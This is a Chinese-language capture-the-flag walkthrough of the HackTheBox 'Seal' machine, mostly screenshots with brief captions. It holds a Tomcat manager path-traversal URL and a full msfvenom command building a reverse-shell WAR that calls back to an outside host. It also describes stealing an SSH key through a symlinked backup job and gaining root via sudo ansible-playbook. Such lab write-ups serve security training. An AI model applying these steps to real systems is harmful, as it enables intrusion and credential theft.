Seal - HackTheBox
Td

image

nmap扫描

image

image

image

访问443端口

image

image

添加一下hosts文件

image

扫下目录

image

image

继续扫

image

image

要登录

看看8080端口

image

注册一个进去看看

image

在历史文件中找到了tomcat的账号和密码

image

image

image

image

到了后台,找半天没找着war包上传点,搜了一下,需要利用tomcat的目录穿越漏洞

https://seal.htb/manager;()/html

image

生成一个war包

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.21 LPORT=7777 -f war -o shell.war

image

上传

image

监听

image

提权

image

发现一个疑似备份的文件夹

image

image

image

感觉有个定时任务在执行打包操作,pspy64看一下

image

image

l开头貌似是可以连接文件的意思

https://jsom1.github.io/_walkthroughs/Seal

image

连接luis/.ssh文件夹,当定时任务执行后,就会将luis/.ssh的文件打包到/opt/backups/archives下

image

将打包文件复制到tmp目录下进行解压。uploads目录下有luis的密钥文件

image

ssh连接

image

继续提权

image

有一个sudo命令

image

意思是用ansible-playbook命令执行yml文件时,会调用yml文件内的内容当作命令执行,在本地制作一个反弹shell的yml文件

image

image

image